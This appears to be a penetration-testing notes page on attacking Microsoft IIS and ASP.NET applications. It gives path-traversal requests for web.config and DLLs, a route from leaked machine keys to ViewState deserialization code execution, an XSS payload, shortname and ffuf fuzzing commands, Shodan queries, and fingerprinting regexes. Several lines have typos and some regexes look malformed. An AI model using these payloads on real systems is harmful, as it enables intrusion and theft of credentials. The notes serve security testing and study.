Hacking IIS Applications

Resources

https://youtu.be/XlmeSFm3RT4?si=hfhzGF9ymG6Igt5j

https://www.youtube.com/watch?v=cqM-MdPkaWo

https://www.youtube.com/watch?v=yyD8Z5Qar5I

https://www.youtube.com/watch?v=_4W0WXUatiw

Soroush Dalili (@irsdl) Blog | A web application security ninja 🥷, a semicolon enthusiast!

Exploiting Deserialisation in ASP.NET via ViewStateSoroush Dalili (@irsdl) Blog

Microsoft IIS Server Shortnames & Tilde Magic 🪄Medium

ASP.NET Microsoft IIS PentestingMedium

https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/iis-internet-information-book.hacktricks.xyz

HTTPAPI 2.0 Assets

Got HTTPAPI ERROR 404
It is IP but you can get the subdomain from the certificate common name
Edit the Host Header

VHost Hopping

Came across subdomain that running IIS Server apply.company.com
VHost Enumeration using ffuf or burp intruder
Found mssql.company.com
Running MSSQL Explorer/Manager

Local FIle Disclosure to DLLs

DownloadCategoryExcel?fileName=../../web.config
DownloadCategoryExcel?fileName=../../glopal.asax
<add namespace="Company.Web.Api.dell/>
DownloadCategoryExcel?fileName=../../bin/Company.Web.Api.dll

LFD -> RCE

https://bit.ly/2MzJ1qI
Optain machinekey from web.config file (validation key and decryption keyy)
VIEWSTATE -> Insecure Deserialization -> RCE
https://github.com/0xacb/viewgen

RCE with Local

Exploiting XXE with local DTD files

ASP.NET XSS

All is XSS that comes to the .NETisec_pl

Try in login pages, redirects, forms & dynamic URL construction (~/images/). Payload: /(A(%22onerror='alert%60123%60'test))/

DNSpy

Found Leaked zip files contains DLL Files?
https://github.com/dnSpy/dnSpy
Use DNSpy to reverse them to source code
or https://www.jetbrains.com/decompiler/

IIS Discovery Bruteforce

Partial Fuzzing

shortscan https://apply.company.com/
IIS Short Name Scanner
- Explore the latest version on GitHub.
Got a part of file names not the full name ? let's fuzz the rest
LIDSDI -> LIDFUZZ | EASYFI -> EASYFUZZ
ffuf -w wordlist.txt -D -e asp,aspx,ashx,asmx -t 100 -c -u https://apply.company.com/lidsFUZZ
You can make your own wro=dlist using wordlist generator https://sourceforge.net/projects/crunch-wordlist/ https://github.com/jim3ma/crunch
./crunch 0 3 abcdefghijklmnopqrstuvwxyz0123456789 -o 3char.txt
Fuzzing doesn't work? try search in Github or use https://github.com/retkoussa/gsnw

Nuclei

Check out the Nuclei templates for fuzzing techniques.

Fingerprinting with Shodan

Utilize Shodan to identify IIS instances with specific characteristics:

http.title:"IIS"
Ssl:"Company Inc." http.title:"IIS"
Ssl.cert.subject.CN:"company.in" http.title:"IIS"

Fingerprinting Techniques

Cookies

ASP.NET_Sessionid
ASPSESSION

Headers Regex

X-AspNet-Version: (.*)\\;version:\\1
X-Powered-By:^ASP\\.NET

HTML Regex

<input[^>]+name\"_VIEWSTATE

URL Regex

\\.aspx?(?.$|\\?)

Ignoring Directories from Scanning

Exclude these directories from your scans:

ASPNET~1
DEFAULT~1.ASP
DEFAULT~1.CSS
GLOBAL.ASA
GLOBAL.ASP
GLOBAL.CS
MASTER.CS
WEB.CON

Extensions to Bruteforce

Bruteforce file extensions to uncover vulnerabilities:

.aspx (Legacy active server pages)
.aspx (Modern Active server pages)
.ashx (APIs/AJAX)
.wsdl (Web Services Description Language)
.wadl (Web Application Description Languages)
.asmx (XML Web Services)
.xml
.zip
.txt

Port Scanning

naabu -host iis.target.com

PreviousCSP NextDependency Confusion

Last updated 1 year ago

Was this helpful?